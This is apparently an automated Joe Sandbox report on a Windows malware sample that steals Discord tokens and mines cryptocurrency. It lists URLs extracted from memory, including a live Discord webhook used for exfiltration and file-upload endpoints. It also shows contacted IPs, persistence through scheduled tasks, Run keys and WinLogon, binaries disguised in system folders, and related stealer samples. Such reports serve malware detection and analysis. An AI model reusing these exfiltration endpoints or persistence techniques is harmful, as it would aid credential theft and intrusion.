https://discordapp.com/api/v9/users/	based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/urllib3/urllib3/issues/2920	based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	based.exe, 00000004.00000002.2387215842.00000201D157E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2357805259.00000201D0F1C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2387215842.00000201D1569000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://yahoo.com/	based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://account.bellmedia.c	based.exe, 00000004.00000002.2387954402.00000201D1C30000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	based.exe, 00000004.00000003.2380504617.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1871128429.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1858412342.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2378136053.00000201D0929000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1763481710.00000201D092B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2376943014.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2359523519.00000201D0929000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.gofile.io/getServerr;r	based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://login.microsoftonline.com	based.exe, 00000004.00000002.2387954402.00000201D1C28000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cacerts.digicert.co	hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://html.spec.whatwg.org/multipage/	based.exe, 00000004.00000003.1857154542.00000201D075A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D075A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	based.exe, 00000004.00000002.2386503993.00000201D0F40000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.zhihu.com/	based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	based.exe, 00000004.00000003.2358410623.00000201D0E91000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.gofile.io/getServer	based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0	based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.co.uk/	based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.gofile.io/getServerr;	based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningse=Lax0	based.exe, 00000004.00000002.2386503993.00000201D0F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.python.org/dev/peps/pep-0205/	hacn.exe, 00000001.00000003.1670114307.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1674833152.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690904651.000002075D06D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.wykop.pl/	based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://twitter.com/	based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.olx.pl/	based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2	based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefox	based.exe, 00000004.00000003.1857154542.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1745863108.00000201D0CA5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://google.com/	based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/mail/	based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://google.com/mail/	based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1877831426.00000201D081E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1857154542.00000201D081F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1852139141.00000201D081F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.fr/	based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.png	based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/complete/	based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.openssl.org/H	based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2394059861.00007FFDFAFB6000.00000004.00000001.01000000.00000019.sdmp, based.exe, 00000004.00000002.2392435887.00007FFDFAC52000.00000004.00000001.01000000.0000001A.sdmp	false	URL Reputation: safe	unknown
https://api.anonfiles.com/uploadrU	based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000011.00000002.1879607528.0000028A3B441000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
162.159.136.232	discord.com	United States	13335	CLOUDFLARENETUS	true
194.58.42.154	unknown	Russian Federation	197695	AS-REGRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1485736
Start date and time:	2024-08-01 04:26:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	97
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	8Ck8T5qRcC.exe renamed because original name is a hash value
Original Sample Name:	4FEC8FAF6590F62034AD44A54175B9E9.exe
Detection:	MAL
Classification:	mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@147/153@3/4
EGA Information:	Successful, ratio: 80%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe, WmiPrvSE.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 142.250.186.35
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, pool.hashvault.pro, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target hacn.exe, PID 6804 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:27:18	Task Scheduler	Run new task: HpQPPZazcv path: "C:\Recovery\HpQPPZazcv.exe"
03:27:19	Task Scheduler	Run new task: HpQPPZazcvH path: "C:\Recovery\HpQPPZazcv.exe"
03:27:21	Task Scheduler	Run new task: based path: "C:\Program Files\Windows Defender\en-US\based.exe"
03:27:21	Task Scheduler	Run new task: basedb path: "C:\Program Files\Windows Defender\en-US\based.exe"
03:27:21	Task Scheduler	Run new task: csrss path: "C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
03:27:21	Task Scheduler	Run new task: csrssc path: "C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
03:27:21	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
03:27:21	Task Scheduler	Run new task: powershell path: "C:\Recovery\powershell.exe"
03:27:22	Task Scheduler	Run new task: powershellp path: "C:\Recovery\powershell.exe"
03:27:25	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv "C:\Windows\Prefetch\HpQPPZazcv.exe"
03:27:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
03:27:41	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run based "C:\Program Files\Windows Defender\en-US\based.exe"
03:27:50	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
03:28:00	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv "C:\Windows\Prefetch\HpQPPZazcv.exe"
03:28:10	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
03:28:19	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run based "C:\Program Files\Windows Defender\en-US\based.exe"
03:28:27	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
03:28:36	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv "C:\Windows\Prefetch\HpQPPZazcv.exe"
03:28:44	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
03:28:52	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run based "C:\Program Files\Windows Defender\en-US\based.exe"
03:29:02	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
03:29:19	Autostart	Run: WinLogon Shell "C:\Recovery\HpQPPZazcv.exe"
03:29:27	Autostart	Run: WinLogon Shell "C:\Recovery\powershell.exe"
22:27:05	API Interceptor	1x Sleep call for process: setup.exe modified
22:27:09	API Interceptor	136x Sleep call for process: powershell.exe modified
22:27:12	API Interceptor	1x Sleep call for process: WMIC.exe modified
22:27:48	API Interceptor	21837x Sleep call for process: HpQPPZazcv.exe modified
22:27:55	API Interceptor	2x Sleep call for process: cmd.exe modified
22:27:55	API Interceptor	39x Sleep call for process: based.exe modified
22:27:55	API Interceptor	10x Sleep call for process: conhost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	5oci4lcontract.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	ip-api.com/line/?fields=hosting
	Nursultan Alpha (perm).exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	QUOTATION.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	Inquiry.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	ip-api.com/line/?fields=hosting
	1722411965141529826f4dae57592d39157455e6b233f1635d04af2f411046a550ec754e7b174.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Nuevo Orden.vbs	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	DHL- INVOICE-1851940333.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	cotizaci#U00f2n.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Orden-23014.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Orden de compra.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
149.154.167.220	wslakcasiepsaa.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	z61FACTURA98765RT67803.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Product Items.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	0242_FV1_241356.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Quotation.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PO4541 , PO4537.pdf.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse
	FACTURA0876.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Confirmation transfer Copy AGS # 22-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	NEW LIST.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
162.159.136.232	S23UhdW5DH.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc	Browse	discord.com/administrator/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	Zoom_workspace.hta	Get hash	malicious	Cobalt Strike, Clipboard Hijacker	Browse	162.159.138.232
	SecuriteInfo.com.Python.Muldrop.16.5435.25481.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	EJH8vdN1sP.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	TamenuV11.msi	Get hash	malicious	Unknown	Browse	162.159.135.232
	http://discord-proxy.tassadar2002.workers.dev/	Get hash	malicious	Unknown	Browse	162.159.138.232
	http://dapi.190823.xyz/	Get hash	malicious	Unknown	Browse	162.159.138.232
	http://via.evove.top	Get hash	malicious	Unknown	Browse	162.159.136.232
	LisectAVT_2403002A_147.exe	Get hash	malicious	Blank Grabber	Browse	162.159.138.232
	LisectAVT_2403002A_210.exe	Get hash	malicious	Python Stealer, Empyrean, Discord Token Stealer	Browse	162.159.128.233
	LisectAVT_2403002A_368.exe	Get hash	malicious	Blank Grabber, DCRat, Umbral Stealer	Browse	162.159.138.232
ip-api.com	5oci4lcontract.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	208.95.112.1
	Nursultan Alpha (perm).exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	QUOTATION.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Inquiry.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	208.95.112.1
	1722411965141529826f4dae57592d39157455e6b233f1635d04af2f411046a550ec754e7b174.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Nuevo Orden.vbs	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DHL- INVOICE-1851940333.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	cotizaci#U00f2n.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Orden-23014.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Orden de compra.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
api.telegram.org	wslakcasiepsaa.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	z61FACTURA98765RT67803.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Product Items.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	0242_FV1_241356.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Quotation.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO4541 , PO4537.pdf.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	149.154.167.220
	FACTURA.PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	FACTURA0876.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Confirmation transfer Copy AGS # 22-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	https://khpornvideocambodia.vvipwww.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://distrosourcess6.sg-host.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	wslakcasiepsaa.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	z61FACTURA98765RT67803.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Product Items.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	0242_FV1_241356.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Quotation.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO4541 , PO4537.pdf.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	149.154.167.220
	FACTURA0876.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Factura.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
AS-REGRU	SecuriteInfo.com.Win32.RATX-gen.24742.674.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	37.140.192.90
	Payrol list.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	https://kaslasa.ru/	Get hash	malicious	Unknown	Browse	31.31.196.178
	QTmGYKK6SL.exe	Get hash	malicious	Unknown	Browse	194.87.219.156
	file.exe	Get hash	malicious	Vidar	Browse	194.87.219.156
	LisectAVT_2403002C_106.exe	Get hash	malicious	Darkbot	Browse	194.58.112.165
	LisectAVT_2403002A_117.exe	Get hash	malicious	RedLine	Browse	194.87.107.145
	IIMG_00172424.exe	Get hash	malicious	FormBook	Browse	37.140.192.90
	SecuriteInfo.com.Trojan.PackedNET.2966.14355.23143.exe	Get hash	malicious	FormBook	Browse	37.140.192.90
	desDGzeznq.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	194.87.181.56
CLOUDFLARENETUS	#4857395846#.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.21.47.110
	http://eu.docusign.net	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://eu.docusign.net	Get hash	malicious	Unknown	Browse	104.18.66.57
	https://app.getresponse.com/click.html?x=a62b&lc=hn2fb4&mc=Ju&s=BOXwMKM&u=ytovh&z=EJoIFfn&	Get hash	malicious	Unknown	Browse	104.17.25.14
	39d1db9cca45315f220c27a3de0fffe5d071c2a0c69c6e91efabe0655d61baf9_payload.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	https://drive.google.com/file/d/1zSpnnmNby57iJjkk1VT46OLWl7gkrx-3/view?usp=sharing_eil_m&ts=66aa52c7	Get hash	malicious	Unknown	Browse	172.64.41.3
	http://is.gd/pttgovjx	Get hash	malicious	Unknown	Browse	172.67.74.152
	http://is.gd/pttgovyqa2	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://khpornvideocambodia.vvipwww.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=VEPAnwijpUm87o3xy8ND1cJ8xINveHJMur3NEXJwuyVUMTlIVElEVTE5QlBXTExERkQ0NDhHVElDMi4u	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
TUT-ASUS	5oci4lcontract.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	208.95.112.1
	Nursultan Alpha (perm).exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	QUOTATION.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Inquiry.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	208.95.112.1
	1722411965141529826f4dae57592d39157455e6b233f1635d04af2f411046a550ec754e7b174.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Nuevo Orden.vbs	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DHL- INVOICE-1851940333.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	cotizaci#U00f2n.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Orden-23014.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Orden de compra.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\setup.exe	TS-240605-Millenium1.exe	Get hash	malicious	Blank Grabber, Discord Token Stealer, Millenuim RAT, Xmrig	Browse
	DevxExecutor.exe	Get hash	malicious	Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT	Browse
	hacn.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT, Xmrig	Browse
C:\Program Files\Google\Chrome\updater.exe	TS-240605-Millenium1.exe	Get hash	malicious	Blank Grabber, Discord Token Stealer, Millenuim RAT, Xmrig	Browse
	DevxExecutor.exe	Get hash	malicious	Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT	Browse
	hacn.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT, Xmrig	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\ProgramData\setup.exe
